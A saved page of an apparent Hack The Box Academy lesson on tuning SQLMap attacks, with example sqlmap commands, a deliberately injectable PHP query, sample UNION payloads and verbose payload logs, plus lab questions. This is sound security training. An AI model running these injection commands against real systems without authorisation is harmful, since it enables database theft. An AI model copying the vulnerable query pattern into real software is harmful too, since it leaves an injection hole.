<!DOCTYPE html>
<!-- saved from url=(0052)https://academy.hackthebox.com/module/58/section/526 -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>SQLMap Essentials</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta content="Premium Multipurpose Admin &amp; Dashboard Template" name="description">
<meta content="Themesbrand" name="author">
<link rel="shortcut icon" href="https://academy.hackthebox.com/images/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://academy.hackthebox.com/images/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://academy.hackthebox.com/images/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://academy.hackthebox.com/images/apple-touch-icon.png">
<link rel="mask-icon" href="https://academy.hackthebox.com/images/safari-pinned-tab.svg">
<link href="./SQLMap Essentials6_files/bootstrap-dark.css" id="bootstrap-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials6_files/icons.css" rel="stylesheet" type="text/css">
<link href="./SQLMap Essentials6_files/app-dark.css" id="app-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials6_files/prism.css" id="app-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials6_files/toastr.min.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="./SQLMap Essentials6_files/ryt3opf.css">
<script type="text/javascript" async="" src="./SQLMap Essentials6_files/awwxrc0h"></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/uwt.js.download"></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/insight.min.js.download"></script><script src="./SQLMap Essentials6_files/346791856678772" async=""></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/fbevents.js.download"></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/analytics.js.download"></script><script type="text/javascript" src="./SQLMap Essentials6_files/commons.54701049fd6fb8497e9e.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials6_files/intercom.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials6_files/twitter-ads.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials6_files/linkedin-insight-tag.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials6_files/facebook-pixel.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials6_files/google-analytics.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/recaptcha__en.js.download" crossorigin="anonymous" integrity="sha384-o1nfdUm9cV7Sx6HxXDsnady1EGmCBTwza/JTA6OSowyOK+wq0YF0+F9jejHVacaR"></script><script type="text/javascript" async="" src="./SQLMap Essentials6_files/analytics.min.js.download"></script><script>
        !function(){var analytics=window.analytics=window.analytics||[];if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Segment snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on","addSourceMiddleware","addIntegrationMiddleware","setAnonymousId","addDestinationMiddleware"];analytics.factory=function(e){return function(){var t=Array.prototype.slice.call(arguments);t.unshift(e);analytics.push(t);return analytics}};for(var e=0;e<analytics.methods.length;e++){var key=analytics.methods[e];analytics[key]=analytics.factory(key)}analytics.load=function(key,e){var t=document.createElement("script");t.type="text/javascript";t.async=!0;t.src="https://cdn.segment.com/analytics.js/v1/" + key + "/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n);analytics._loadOptions=e};analytics._writeKey="eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I";analytics.SNIPPET_VERSION="4.13.2";
                analytics.load("eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I");
                                                        properties = {"platform":"Academy","platform_version":"V1","module_id":58,"module_name":"SQLMap Essentials","module_difficulty":"Easy","section_id":526,"section_title":"Attack Tuning"};
                                                analytics.page(
                    "Module",
                    properties
                );
                                            }
        }();
    </script>
<style>
    .website-screenshot-url {
        height: 22px;
        cursor: text;
        padding-left: 10px;
    }
</style>
<script src="./SQLMap Essentials6_files/api.js.download"></script>
</head>
<body data-layout="detached" data-topbar="colored">
<div class="container-fluid">
<div id="layout-wrapper">
<header id="page-topbar">
<div class="navbar-header">
<div class="container-fluid">
<div class="float-right">
<div class="dropdown d-none d-lg-inline-block ml-1">
<a href="https://academy.hackthebox.com/billing">
<button type="button" class="btn btn-extra-light">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;Purchase Cubes
</button>
</a>
</div>
<div class="dropdown d-none d-lg-inline-block ml-1">
<button type="button" class="btn header-item noti-icon waves-effect" data-toggle="fullscreen">
<i class="mdi mdi-fullscreen"></i>
</button>
</div>
<div class="dropdown d-inline-block">
<button type="button" class="btn header-item waves-effect" id="page-header-user-dropdown" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<img class="rounded-circle header-profile-user" src="./SQLMap Essentials6_files/1782606024b767354a8c9d75e1a6323a" alt="Header Avatar">
<span class="d-none d-xl-inline-block ml-1">Tommy034</span>
<i class="mdi mdi-chevron-down d-none d-xl-inline-block"></i>
</button>
<div class="dropdown-menu dropdown-menu-right">
<a class="dropdown-item" href="https://academy.hackthebox.com/billing"><i class="bx bx-wallet font-size-16 align-middle mr-1"></i> Billing</a>
<a class="dropdown-item d-block" href="https://academy.hackthebox.com/settings"><i class="bx bx-wrench font-size-16 align-middle mr-1"></i> Settings</a>
<a class="dropdown-item d-block" href="https://academy.hackthebox.com/vpn"><i class="bx bx-server font-size-16 align-middle mr-1"></i> Vpn Settings</a>
<div class="dropdown-divider"></div>
<form method="POST" action="https://academy.hackthebox.com/logout"> <input type="hidden" name="_token" value="OEgK0JdzOZwGIHHODUXYrzCqZr0uFSlpTj7r9g5E"> <a onclick="$(this).closest(&#39;form&#39;).submit()" class="dropdown-item text-danger" href="https://academy.hackthebox.com/module/58/section/526#"><i class="bx bx-power-off font-size-16 align-middle mr-1 text-danger"></i> Logout</a>
</form>
</div>
</div>
</div>
<div class="d-flex align-items-center">
<div class="navbar-brand-box">
<a href="https://academy.hackthebox.com/dashboard" class="logo">
<span class="logo-sm">
<img src="./SQLMap Essentials6_files/logo.svg" alt="" height="30">
</span>
<span class="logo-lg">
<img src="./SQLMap Essentials6_files/logo.svg" alt="" height="36">
</span>
</a>
</div>
<button type="button" class="btn btn-sm px-3 font-size-16 header-item toggle-btn waves-effect" id="vertical-menu-btn">
<i class="fa fa-fw fa-bars"></i>
</button>
<div class="topnav">
<nav class="navbar navbar-light navbar-expand-lg topnav-menu">
<div class="collapse navbar-collapse" id="topnav-menu-content">
<ul class="navbar-nav active">
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/dashboard"><i class="mdi mdi-monitor-dashboard"></i> Dashboard</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/modules"><i class="mdi mdi-book-open"></i>
Modules</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/paths"><i class="mdi mdi-map-marker-path"></i> Paths</a>
</li>
</ul>
</div>
</nav>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="page-content">
<div class="row">
<div class="col-12">
<div class="page-title-box d-flex align-items-center justify-content-between">
<h4 class="page-title mb-0 font-size-18 letter-spacing-1">SQLMap Essentials &nbsp;<i style="cursor:pointer;" data-module-id="58" data-toggle="tooltip" data-title="Toggle To-Do" class="favouriteBtn  fa  fa-heart text-danger" data-original-title="" title=""></i></h4>
<div class="page-title-right">
<ol class="breadcrumb m-0">
<li class="breadcrumb-item"><a href="javascript: void(0);">Page 6</a></li>
<li class="breadcrumb-item active">Attack Tuning</li>
</ol>
</div>
</div>
</div>
</div>
<div class="row justify-content-xl-center">
<div class="col-md-12 col-xl-9 col-xxl-7">
<div class="training-module">
<h1>Attack Tuning</h1>
<hr>
<p>In most cases, SQLMap should run out of the box with the provided target details. Nevertheless, there are options to fine-tune the SQLi injection attempts to help SQLMap in the detection phase. Every payload sent to the target consists of:</p>
<ul>
<li>
<p>vector (e.g., <code>UNION ALL SELECT 1,2,VERSION()</code>): central part of the payload, carrying the useful SQL code to be executed at the target.</p>
</li>
<li>
<p>boundaries (e.g. <code>'&lt;vector&gt;-- -</code>): prefix and suffix formations, used for proper injection of the vector into the vulnerable SQL statement.</p>
</li>
</ul>
<hr>
<h2>Prefix/Suffix</h2>
<p>There is a requirement for special prefix and suffix values in rare cases, not covered by the regular SQLMap run.<br>
For such runs, options <code>--prefix</code> and <code>--suffix</code> can be used as follows:</p>
<div class="window_container"><div class="window_content"><div class="window_top">Code: <span class="text-success">bash</span></div><pre class=" language-bash"><code class=" language-bash">sqlmap -u <span class="token string">"www.example.com/?q=test"</span> --prefix<span class="token operator">=</span><span class="token string">"%'))"</span> --suffix<span class="token operator">=</span><span class="token string">"-- -"</span>
</code></pre></div></div>
<p>This will result in an enclosure of all vector values between the static prefix <code>%'))</code> and the suffix <code>-- -</code>.<br>
For example, if the vulnerable code at the target is:</p>
<div class="window_container"><div class="window_content"><div class="window_top">Code: <span class="text-success">php</span></div><pre class=" language-php"><code class=" language-php"><span class="token variable">$query</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"SELECT id,name,surname FROM users WHERE id LIKE (('"</span> <span class="token punctuation">.</span> <span class="token global">$_GET</span><span class="token punctuation">[</span><span class="token double-quoted-string string">"q"</span><span class="token punctuation">]</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">"')) LIMIT 0,1"</span><span class="token punctuation">;</span>
<span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span><span class="token punctuation">(</span><span class="token variable">$link</span><span class="token punctuation">,</span> <span class="token variable">$query</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre></div></div>
<p>The vector <code>UNION ALL SELECT 1,2,VERSION()</code>, bounded with the prefix <code>%'))</code> and the suffix <code>-- -</code>, will result in the following (valid) SQL statement at the target:</p>
<div class="window_container"><div class="window_content"><div class="window_top">Code: <span class="text-success">sql</span></div><pre class=" language-sql"><code class=" language-sql"><span class="token keyword">SELECT</span> id<span class="token punctuation">,</span>name<span class="token punctuation">,</span>surname <span class="token keyword">FROM</span> users <span class="token keyword">WHERE</span> id <span class="token operator">LIKE</span> <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'test%'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">UNION</span> <span class="token keyword">ALL</span> <span class="token keyword">SELECT</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span>VERSION<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token comment">-- -')) LIMIT 0,1</span>
</code></pre></div></div>
<hr>
<h2>Level/Risk</h2>
<p>By default, SQLMap combines a predefined set of most common boundaries (i.e., prefix/suffix pairs), along with the vectors having a high chance of success in case of a vulnerable target. Nevertheless, there is a possibility for users to use bigger sets of boundaries and vectors, already incorporated into the SQLMap.</p>
<p>For such demands, the options <code>--level</code> and <code>--risk</code> should be used:</p>
<ul>
<li>
<p>The option <code>--level</code> (<code>1-5</code>, default <code>1</code>) extends both vectors and boundaries being used, based on their expectancy of success (i.e., the lower the expectancy, the higher the level).</p>
</li>
<li>
<p>The option <code>--risk</code> (<code>1-3</code>, default <code>1</code>) extends the used vector set based on their risk of causing problems at the target side (i.e., risk of database entry loss or denial-of-service).</p>
</li>
</ul>
<p>The best way to check for differences between used boundaries and payloads for different values of <code>--level</code> and <code>--risk</code>, is the usage of <code>-v</code> option to set the verbosity level. In verbosity 3 or higher (e.g. <code>-v 3</code>), messages containing the used <code>[PAYLOAD]</code> will be displayed, as follows:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u www.example.com/?id<span class="token operator">=</span><span class="token number">1</span> -v <span class="token number">3</span> --level<span class="token operator">=</span><span class="token number">5</span></span></span>

<span class="token output">...SNIP...
[14:17:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:17:07] [PAYLOAD] 1) AND 5907=7031-- AuiO
[14:17:07] [PAYLOAD] 1) AND 7891=5700 AND (3236=3236
...SNIP...
[14:17:07] [PAYLOAD] 1')) AND 1049=6686 AND (('OoWT' LIKE 'OoWT
[14:17:07] [PAYLOAD] 1'))) AND 4534=9645 AND ((('DdNs' LIKE 'DdNs
[14:17:07] [PAYLOAD] 1%' AND 7681=3258 AND 'hPZg%'='hPZg
...SNIP...
[14:17:07] [PAYLOAD] 1")) AND 4540=7088 AND (("hUye"="hUye
[14:17:07] [PAYLOAD] 1"))) AND 6823=7134 AND ((("aWZj"="aWZj
[14:17:07] [PAYLOAD] 1" AND 7613=7254 AND "NMxB"="NMxB
...SNIP...
[14:17:07] [PAYLOAD] 1"="1" AND 3219=7390 AND "1"="1
</span><span class="token info punctuation">[14<span class="token punctuation">:</span><span class="token path">17:07] [PAYLOAD] 1' IN BOOLEAN MODE) AND 1847=8795</span></span><span class="token output">#
[14:17:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
</span></code></pre></div></div>
<p>On the other hand, payloads used with the default <code>--level</code> value have a considerably smaller set of boundaries:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u www.example.com/?id<span class="token operator">=</span><span class="token number">1</span> -v <span class="token number">3</span></span></span>
<span class="token output">...SNIP...
[14:20:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:20:36] [PAYLOAD] 1) AND 2678=8644 AND (3836=3836
[14:20:36] [PAYLOAD] 1 AND 7496=4313
[14:20:36] [PAYLOAD] 1 AND 7036=6691-- DmQN
[14:20:36] [PAYLOAD] 1') AND 9393=3783 AND ('SgYz'='SgYz
[14:20:36] [PAYLOAD] 1' AND 6214=3411 AND 'BhwY'='BhwY
[14:20:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
</span></code></pre></div></div>
<p>As for vectors, we can compare used payloads as follows:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u www.example.com/?id<span class="token operator">=</span><span class="token number">1</span></span></span>
<span class="token output">...SNIP...
[14:42:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:42:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[14:42:38] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
...SNIP...
</span></code></pre></div></div>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u www.example.com/?id<span class="token operator">=</span><span class="token number">1</span> --level<span class="token operator">=</span><span class="token number">5</span> --risk<span class="token operator">=</span><span class="token number">3</span></span></span>

<span class="token output">...SNIP...
[14:46:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:46:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[14:46:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
...SNIP...
[14:46:05] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[14:46:05] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[14:46:05] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
...SNIP...
[14:46:05] [INFO] testing 'MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[14:46:05] [INFO] testing 'MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[14:46:05] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY clause (original value)'
...SNIP...
[14:46:05] [INFO] testing 'SAP MaxDB boolean-based blind - Stacked queries'
[14:46:06] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:46:06] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
...SNIP...
</span></code></pre></div></div>
<p>As for the number of payloads, by default (i.e. <code>--level=1 --risk=1</code>), the number of payloads used for testing a single parameter goes up to 72, while in the most detailed case (<code>--level=5 --risk=3</code>) the number of payloads increases to 7,865.</p>
<p>As SQLMap is already tuned to check for the most common boundaries and vectors, regular users are advised not to touch these options because it will make the whole detection process considerably slower. Nevertheless, in special cases of SQLi vulnerabilities, where usage of <code>OR</code> payloads is a must (e.g., in case of <code>login</code> pages), we may have to raise the risk level ourselves.</p>
<p>This is because <code>OR</code> payloads are inherently dangerous in a default run, where underlying vulnerable SQL statements (although less commonly) are actively modifying the database content (e.g. <code>DELETE</code> or <code>UPDATE</code>).</p>
<hr>
<h2>Advanced Tuning</h2>
<p>To further fine-tune the detection mechanism, there is a hefty set of switches and options. In regular cases, SQLMap will not require its usage. Still, we need to be familiar with them so that we could use them when needed.</p>
<h4>Status Codes</h4>
<p>For example, when dealing with a huge target response with a lot of dynamic content, subtle differences between <code>TRUE</code> and <code>FALSE</code> responses could be used for detection purposes. If the difference between <code>TRUE</code> and <code>FALSE</code> responses can be seen in the HTTP codes (e.g. <code>200</code> for <code>TRUE</code> and <code>500</code> for <code>FALSE</code>), the option <code>--code</code> could be used to fixate the detection of <code>TRUE</code> responses to a specific HTTP code (e.g. <code>--code=200</code>).</p>
<h4>Titles</h4>
<p>If the difference between responses can be seen by inspecting the HTTP page titles, the switch <code>--titles</code> could be used to instruct the detection mechanism to base the comparison based on the content of the HTML tag <code>&lt;title&gt;</code>.</p>
<h4>Strings</h4>
<p>In case of a specific string value appearing in <code>TRUE</code> responses (e.g. <code>success</code>), while absent in <code>FALSE</code> responses, the option <code>--string</code> could be used to fixate the detection based only on the appearance of that single value (e.g. <code>--string=success</code>).</p>
<h4>Text-only</h4>
<p>When dealing with a lot of hidden content, such as certain HTML page behaviors tags (e.g. <code>&lt;script&gt;</code>, <code>&lt;style&gt;</code>, <code>&lt;meta&gt;</code>, etc.), we can use the <code>--text-only</code> switch, which removes all the HTML tags, and bases the comparison only on the textual (i.e., visible) content.</p>
<h4>Techniques</h4>
<p>In some special cases, we have to narrow down the used payloads only to a certain type. For example, if the time-based blind payloads are causing trouble in the form of response timeouts, or if we want to force the usage of a specific SQLi payload type, the option <code>--technique</code> can specify the SQLi technique to be used.</p>
<p>For example, if we want to skip the time-based blind and stacking SQLi payloads and only test for the boolean-based blind, error-based, and UNION-query payloads, we can specify these techniques with <code>--technique=BEU</code>.</p>
<h4>UNION SQLi Tuning</h4>
<p>In some cases, <code>UNION</code> SQLi payloads require extra user-provided information to work. If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option <code>--union-cols</code> (e.g. <code>--union-cols=17</code>). In case that the default "dummy" filling values used by SQLMap -<code>NULL</code> and random integer- are not compatible with values from results of the vulnerable SQL query, we can specify an alternative value instead (e.g. <code>--union-char='a'</code>).</p>
<p>Furthermore, in case there is a requirement to use an appendix at the end of a <code>UNION</code> query in the form of the <code>FROM &lt;table&gt;</code> (e.g., in case of Oracle), we can set it with the option <code>--union-from</code> (e.g. <code>--union-from=users</code>).<br>
Failing to use the proper <code>FROM</code> appendix automatically could be due to the inability to detect the DBMS name before its usage.</p>
<div id="screen" style="height: 600px; border: 1px solid;">
<div class="screenPlaceholder">
<div class="instanceLoading" style="display: none;">
<h1 class="text-center" style="margin-top: 270px;"><i class="fa fa-circle-notch fa-spin"></i></h1>
<div class="text-center">Instance is starting...</div>
</div>
<div class="instanceTerminating" style="display: none;">
<h1 class="text-center" style="margin-top: 270px;"><i class="fa fa-circle-notch fa-spin"></i></h1>
<div class="text-center">Terminating instance...</div>
</div>
<div class="row instanceStart max-width-canvas">
<div class="col-4"></div>
<div class="col-4">
<button class=" startInstanceBtn btn btn-primary btn-lg btn-block" style="margin-top: 270px;">Start Instance</button>
<p class="text-center mt-2 font-size-13 font-secondary">
<span class="text-success spawnsLeft">
<i class="fal fa-infinity"></i>
</span> / 1 spawns left
</p>
</div>
<div class="col-4"></div>
</div>
</div>
</div>
<div class="row align-center justify-center my-4">
<div class="col-5 justify-start">
<button style="display:none;" target="_blank" class="instance-button fullScreenBtn btn btn-light btn-sm float-left "><i class="fad fa-expand text-success mr-1"></i> &nbsp;Full Screen</button>
<button style="display:none;" class="instance-button terminateInstanceBtn btn btn-light btn-sm ml-2"><i class="fad fa-times text-danger"></i> &nbsp;Terminate</button>
<button style="display:none;" class="instance-button resetInstanceBtn btn btn-light btn-sm ml-1"><i class="fad fa-sync text-warning mr-2"></i> &nbsp;Reset</button>
<div class="btn-group " role="group">
<button style="display:none;cursor: default;" class="instance-button extendInstanceBtn btn btn-light btn-sm ml-1">Life Left: <span class="lifeLeft"></span>m</button>
<button style="display:none;" data-toggle="tooltip" data-title="Extend Life" class=" extendInstanceBtn extendInstanceBtnClicker btn btn-light btn-sm " data-original-title="" title=""><i class="fa fa-plus text-success"></i></button>
</div>
</div>
<div id="statusText" class="col-7 justify-end pt-2 pr-2 font-size-small text-right">Waiting to start...</div>
</div>
<div class="card" id="questionsDiv">
<div class="card-body">
<div class="row">
<div class="col-9">
<h4 class="card-title mt-0 font-size-medium">Questions</h4>
<p class="card-title-desc font-size-large font-size-15">Answer the question(s) below to complete this Section and earn cubes!</p>
<p class="card-title-desc font-size-large font-size-15">
Target: <span class="text-success"><span class="target" style="cursor:pointer;"><span class="spawnTargetBtn">Click here to spawn the target system!</span></span></span>
<button class="resetTargetBtn btn btn-light btn-sm " data-toggle="tooltip" data-title="Reset Target" style="cursor: pointer; display: none;" data-original-title="" title=""><i class="fad fa-sync text-warning"></i></button>
<br>
<span class="targetLifeTimeContainer" style="display: none;">Time Left: <span class="targetLifeTime  font-size-15">0</span> minutes</span>
</p>
 </div>
<div class="col-3 text-right float-right">
<button class="btn btn-light bg-color-blue-nav mt-2" data-toggle="modal" data-target="#cheatSheetModal"><i class="fad fa-file-alt mr-2"></i> Cheat Sheet</button>
</div>
</div>
<div>
<div>
<label class="module-question" for="294"><span class="badge badge-soft-dark font-size-14 mr-2">+ 1 <i class="fad fa-cube text-success"></i></span> What's the contents of table flag5? (Case #5)</label>
<div class="row">
<div class=" col-lg-8  mb-4">
<input class="form-control bg-color-blue-nav" id="answer294" type="text" color="green" placeholder="Submit your answer here..." maxlength="191">
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-primary btn-block btnAnswer" id="btnAnswer294" data-question-id="294"><i class="fad fa-flag-checkered mr-2"></i> Submit</button>
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-outline-warning btn-block" data-toggle="modal" id="hintBtn294" data-target="#hint294"><i class="fad fa-life-ring mr-2"></i> Hint</button>
</div>
</div>
<div class=" custom-hr "></div>
</div>
<div>
<label class="module-question" for="295"><span class="badge badge-soft-dark font-size-14 mr-2">+ 2 <i class="fad fa-cube text-success"></i></span> What's the contents of table flag6? (Case #6)</label>
<div class="row">
<div class=" col-lg-8  mb-4">
<input class="form-control bg-color-blue-nav" id="answer295" type="text" color="green" placeholder="Submit your answer here..." maxlength="191">
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-primary btn-block btnAnswer" id="btnAnswer295" data-question-id="295"><i class="fad fa-flag-checkered mr-2"></i> Submit</button>
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-outline-warning btn-block" data-toggle="modal" id="hintBtn295" data-target="#hint295"><i class="fad fa-life-ring mr-2"></i> Hint</button>
</div>
</div>
<div class=" custom-hr "></div>
</div>
<div>
<label class="module-question" for="296"><span class="badge badge-soft-dark font-size-14 mr-2">+ 1 <i class="fad fa-cube text-success"></i></span> What's the contents of table flag7? (Case #7)</label>
<div class="row">
<div class=" col-lg-8  mb-4">
<input class="form-control bg-color-blue-nav" id="answer296" type="text" color="green" placeholder="Submit your answer here..." maxlength="191">
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-primary btn-block btnAnswer" id="btnAnswer296" data-question-id="296"><i class="fad fa-flag-checkered mr-2"></i> Submit</button>
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-outline-warning btn-block" data-toggle="modal" id="hintBtn296" data-target="#hint296"><i class="fad fa-life-ring mr-2"></i> Hint</button>
</div>
</div>
<div class=""></div>
</div>
</div>
</div>
</div>
</div>
<div class="card bg-color-blue-nav" style="margin: 30px 0">
<div class="card-body">
<a href="https://academy.hackthebox.com/module/58/section/695" class="btn btn-light module-button py-2" style="float: left"><i class="fa fa-arrow-alt-left mr-1"></i> Previous</a>
<form action="https://academy.hackthebox.com/module" method="POST" class="form-inline" id="completeForm" style="float: right">
<input type="hidden" name="module_id" value="58">
<input type="hidden" name="page_id" value="7">
<input type="hidden" name="completed" value="1">
<button id="completeBtn" class="btn btn-outline-success" style="display:none;"><i class="fa fa-check-circle"></i> Mark Complete &amp; Next</button>
</form>
<a href="https://academy.hackthebox.com/module/58/section/510" class="btn btn-light ml-2 module-button py-2" style="float: left">Next <i class="ml-1 fa fa-arrow-alt-right"></i></a>
</div>
</div>
</div>
<div class="col-md-12 col-xl-3 col-xxl-3">
<div id="table-of-contents">
<div class="card">
<div class="card-body bg-color-blue-nav">
<button class="btn btn-light btn-block module-button" data-toggle="modal" data-target="#cheatSheetModal"><i class="fad fa-file-alt mr-2"></i> Cheat Sheet</button>
<a href="https://academy.hackthebox.com/module/58/section/526#questionsDiv" class="btn btn-light btn-block module-button"><i class="fad fa-question mr-2"></i> Go to Questions</a>
</div>
</div>
<div class="card" id="TOC">
<div class="card-body bg-color-blue-nav">
<h5 class="card-title font-size-15 mb-4">Table of Contents</h5>
<h6 class="mt-4 mb-2">Getting Started</h6> <a href="https://academy.hackthebox.com/module/58/section/509" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">SQLMap Overview</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/694" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">Getting Started with SQLMap</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/696" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">SQLMap Output Description</span>
</a>
<h6 class="mt-4 mb-2">Building Attacks</h6> <a href="https://academy.hackthebox.com/module/58/section/517" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Running SQLMap on an HTTP Request</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/695" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<span class="font-size-13">Handling SQLMap Errors</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/526" class="btn   text-primary  btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Attack Tuning</span>
</a>
<h6 class="mt-4 mb-2">Database Enumeration</h6> <a href="https://academy.hackthebox.com/module/58/section/510" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Database Enumeration</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/529" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Advanced Database Enumeration</span>
</a>
<h6 class="mt-4 mb-2">Advanced SQLMap Usage</h6> <a href="https://academy.hackthebox.com/module/58/section/530" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
 <i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Bypassing Web Application Protections</span>
</a>
<a href="https://academy.hackthebox.com/module/58/section/697" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">OS Exploitation</span>
</a>
